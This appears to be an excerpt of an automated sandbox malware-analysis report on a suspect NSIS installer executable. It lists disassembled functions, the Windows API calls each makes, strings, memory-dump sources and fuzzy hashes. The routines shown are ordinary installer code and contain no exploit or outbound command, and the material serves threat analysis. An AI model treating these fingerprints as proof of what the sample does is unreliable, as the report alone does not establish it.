                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: verifying installer: %d%%
                                        • API String ID: 1451636040-82062127
                                        • Opcode ID: 8cc8d962d8a99aef7830ba12bdb56859a6c3448b551b59a443d52a8a404c13af
                                        • Instruction ID: 60d807589532a1750165d7633efe1ba379d0dd74474c58c1bab17da8cefdfa8e
                                        • Opcode Fuzzy Hash: 8cc8d962d8a99aef7830ba12bdb56859a6c3448b551b59a443d52a8a404c13af
                                        • Instruction Fuzzy Hash: DA011271944209FBEF209F60DD09EEE37A9EB04304F008039FA06B92D0D7B99995CF59
                                        APIs
                                        • lstrlenA.KERNEL32(Mongrelizes31 Setup: Completed,Mongrelizes31 Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404732,000000DF,00000000,00000400,?), ref: 004048B5
                                        • wsprintfA.USER32 ref: 004048BD
                                        • SetDlgItemTextA.USER32(?,Mongrelizes31 Setup: Completed), ref: 004048D0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s$Mongrelizes31 Setup: Completed
                                        • API String ID: 3540041739-326024652
                                        • Opcode ID: fa3760b7cc8f97072af816aff5d6cd3f5b0d901f8ded19e577a8610c70623aa0
                                        • Instruction ID: e2544e14f383b0e553931f5ad3d2c5e69aaccc6a02b7144a1c376111f1efcf8d
                                        • Opcode Fuzzy Hash: fa3760b7cc8f97072af816aff5d6cd3f5b0d901f8ded19e577a8610c70623aa0
                                        • Instruction Fuzzy Hash: 2B11E473A041283BDB0076699C42EAF3288DB81374F254637FB65F21D1E979DC1286A8
                                        APIs
                                        • GetDC.USER32(?), ref: 00401D98
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                                        • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                                        • CreateFontIndirectA.GDI32(0040A7F0), ref: 00401E1A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                        • String ID:
                                        • API String ID: 3808545654-0
                                        • Opcode ID: 34073e52274d0eea5c5fbf1d3db0759766414d75607053c18096eba5d79a5540
                                        • Instruction ID: 962fd9b87f23d05f09829d6e62e81eb88b122f60c97e2af10dcf53a19e6500d2
                                        • Opcode Fuzzy Hash: 34073e52274d0eea5c5fbf1d3db0759766414d75607053c18096eba5d79a5540
                                        • Instruction Fuzzy Hash: B0015272948340AFE7006BB0AE49F997FF4A715305F108479F241B62E2C67954569F3E
                                        APIs
                                        • GetDlgItem.USER32(?), ref: 00401D3F
                                        • GetClientRect.USER32(00000000,?), ref: 00401D4C
                                        • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                                        • DeleteObject.GDI32(00000000), ref: 00401D8A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: 764c70fbd70d8432b47cb810857664527778e1a3b62db9879bd3831654477798
                                        • Instruction ID: e514ae104980ccf078864521baf36738fde3649283c018ed360e76dc3c34fc32
                                        • Opcode Fuzzy Hash: 764c70fbd70d8432b47cb810857664527778e1a3b62db9879bd3831654477798
                                        • Instruction Fuzzy Hash: 13F0FFB2A04115BFDB01EBA4DD88DAFBBBCEB44301B044476F605F2191C6749D018B79
                                        APIs
                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: 756893ed4847bb0bd72a5117efa2a57ba430928b3e2712cee879890b773371fc
                                        • Instruction ID: 91203bd525acade81736f390ad8a27fd027b74ba1091a33c19100adfebe27d64
                                        • Opcode Fuzzy Hash: 756893ed4847bb0bd72a5117efa2a57ba430928b3e2712cee879890b773371fc
                                        • Instruction Fuzzy Hash: 6C218E71E44209BEEB159FA5D946AAD7BB0EB84304F14803EF505F61D1DA788A408F28
                                        APIs
                                          • Part of subcall function 00405F2F: lstrcpynA.KERNEL32(?,?,00000400,0040328D,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F3C
                                          • Part of subcall function 00405960: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,?,004059CC,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,774D3410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040596E
                                          • Part of subcall function 00405960: CharNextA.USER32(00000000), ref: 00405973
                                          • Part of subcall function 00405960: CharNextA.USER32(00000000), ref: 00405987
                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsw599B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,774D3410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A08
                                        • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,774D3410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,774D3410,C:\Users\user\AppData\Local\Temp\), ref: 00405A18
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsw599B.tmp
                                        • API String ID: 3248276644-3945901156
                                        • Opcode ID: 1798501a893aa51cf33724b967df125bb5b79cc73e901e6a487cbcc52799f4ac
                                        • Instruction ID: 1994e1ad2c5e9883225bba15f0e05bd5e2410f9dbe362fa4db8952c1f9a8588a
                                        • Opcode Fuzzy Hash: 1798501a893aa51cf33724b967df125bb5b79cc73e901e6a487cbcc52799f4ac
                                        • Instruction Fuzzy Hash: B3F04CB6205D5296C622333A1C066EF2A55CE86334719463FF891B13D2DB3C8913DD7E
                                        APIs
                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031A8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 004058CD
                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031A8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 004058D6
                                        • lstrcatA.KERNEL32(?,00409014,?,00000006,00000008,0000000A), ref: 004058E7
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004058C7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrcatlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2659869361-2145255484
                                        • Opcode ID: 7d86c92969947f3077f9a158046bd063bc506289d00538d24d19a3cace2b88b5
                                        • Instruction ID: 8ecb161afe92f8f98ec5c140421c9a6f3833b5d00e23c8f539a5f8bbe46d8a58
                                        • Opcode Fuzzy Hash: 7d86c92969947f3077f9a158046bd063bc506289d00538d24d19a3cace2b88b5
                                        • Instruction Fuzzy Hash: B0D0A962A05D302BD20273159C05E8F2A0CCF12740B0400B2F200B22E2C63C4D428FFE
                                        APIs
                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C19
                                        • RegCloseKey.ADVAPI32(?), ref: 00402C22
                                        • RegCloseKey.ADVAPI32(?), ref: 00402C43
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: Close$Enum
                                        • String ID:
                                        • API String ID: 464197530-0
                                        • Opcode ID: 92a6906e664bbcb47ab1ca28fdd4f13aa4067a21e5a0486ffc58b8f5881c376e
                                        • Instruction ID: 05bed6b59ed8188e40eca3efb14264cb36eb805b2849730c7d7757a09cb5f5a9
                                        • Opcode Fuzzy Hash: 92a6906e664bbcb47ab1ca28fdd4f13aa4067a21e5a0486ffc58b8f5881c376e
                                        • Instruction Fuzzy Hash: BC115B32504119FBEF01AF51CE09B9E7B7AEF14351F104072BA05B50E0E7B5EE52AA68
                                        APIs
                                        • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,?,004059CC,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,774D3410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040596E
                                        • CharNextA.USER32(00000000), ref: 00405973
                                        • CharNextA.USER32(00000000), ref: 00405987
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsw599B.tmp, xrefs: 00405961
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: CharNext
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsw599B.tmp
                                        • API String ID: 3213498283-160415898
                                        • Opcode ID: 78caeea6086e6eed9a212387893711d8897386d9b52ffe3bd3d136e2934aa6d1
                                        • Instruction ID: 9bd73c2178bbc4ada55c293d8cea80d9ef0b2d457d60247f238fee92507865f8
                                        • Opcode Fuzzy Hash: 78caeea6086e6eed9a212387893711d8897386d9b52ffe3bd3d136e2934aa6d1
                                        • Instruction Fuzzy Hash: CDF096D1904F60AEFB3252684C44B779F89CB56771F18447BE940B62C1C27C48418FEB
                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000,00402EC4,00000001), ref: 00402CF7
                                        • GetTickCount.KERNEL32 ref: 00402D15
                                        • CreateDialogParamA.USER32(0000006F,00000000,00402C61,00000000), ref: 00402D32
                                        • ShowWindow.USER32(00000000,00000005), ref: 00402D40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                        • String ID:
                                        • API String ID: 2102729457-0
                                        • Opcode ID: f4337ae7c9a0c2b393fe5f11cb57febad8f5df9eb2ad2e71e21657c922240b80
                                        • Instruction ID: 46e63a0393c595c386a212d898ebec3da19c13aa57c3e66a4565427f31a4a510
                                        • Opcode Fuzzy Hash: f4337ae7c9a0c2b393fe5f11cb57febad8f5df9eb2ad2e71e21657c922240b80
                                        • Instruction Fuzzy Hash: 09F05E70906221ABDA207F20BE4CACA7BA4FB45B527024576F445B11E4C779888ACBDD
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00404FF9
                                        • CallWindowProcA.USER32(?,?,?,?), ref: 0040504A
                                          • Part of subcall function 0040403C: SendMessageA.USER32(00010460,00000000,00000000,00000000), ref: 0040404E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID:
                                        • API String ID: 3748168415-3916222277
                                        • Opcode ID: e712e2a543f08d2e54f60ba561f502afcf318598cb166087ec4cd0ddecdd3944
                                        • Instruction ID: a223dd13e6372a4dd0479c59c93eb21e0d8a99a0ac54a5c20384062b78d82a0f
                                        • Opcode Fuzzy Hash: e712e2a543f08d2e54f60ba561f502afcf318598cb166087ec4cd0ddecdd3944
                                        • Instruction Fuzzy Hash: F1017171104609EBEF205F51DD81A9F3A29EB84795F204037FA01B62D1D77A8C51AAAE
                                        APIs
                                        • FreeLibrary.KERNEL32(?,774D3410,00000000,C:\Users\user\AppData\Local\Temp\,004036C2,004034DC,?,?,00000006,00000008,0000000A), ref: 00403704
                                        • GlobalFree.KERNEL32(00000000), ref: 0040370B
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004036EA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: Free$GlobalLibrary
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 1100898210-2145255484
                                        • Opcode ID: 35d1f02da0abf4a3a5ea65bd0cdd12c9264502c99e7b9c945f64e5a7c8fdc6a2
                                        • Instruction ID: b677e6ccb62fb367f72670c3ce7c034f3dd0af87a7da7d41c05298a088c6e355
                                        • Opcode Fuzzy Hash: 35d1f02da0abf4a3a5ea65bd0cdd12c9264502c99e7b9c945f64e5a7c8fdc6a2
                                        • Instruction Fuzzy Hash: C6E01233815121ABC7356F5BED04B5A77687F45B22F058466EC407B3A0CB746C418FD9
                                        APIs
                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\beNxougDFV.exe,C:\Users\user\Desktop\beNxougDFV.exe,80000000,00000003), ref: 00405914
                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\beNxougDFV.exe,C:\Users\user\Desktop\beNxougDFV.exe,80000000,00000003), ref: 00405922
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrlen
                                        • String ID: C:\Users\user\Desktop
                                        • API String ID: 2709904686-3080008178
                                        • Opcode ID: 714da30cf500cccbdd7b4a4277d37f3a4e299a669b52a45b343dae58782ad56f
                                        • Instruction ID: 79756b3271e31ddeb9bc27b600d1c90533e2d507c88bbc01e3e6e8e0ac64b055
                                        • Opcode Fuzzy Hash: 714da30cf500cccbdd7b4a4277d37f3a4e299a669b52a45b343dae58782ad56f
                                        • Instruction Fuzzy Hash: 1BD0C7B2419D706EE34373559C04B9F6A49DF56750F0904A2E140A61D1C67C5D414BAD
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A3D
                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A55
                                        • CharNextA.USER32(00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A66
                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A6F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
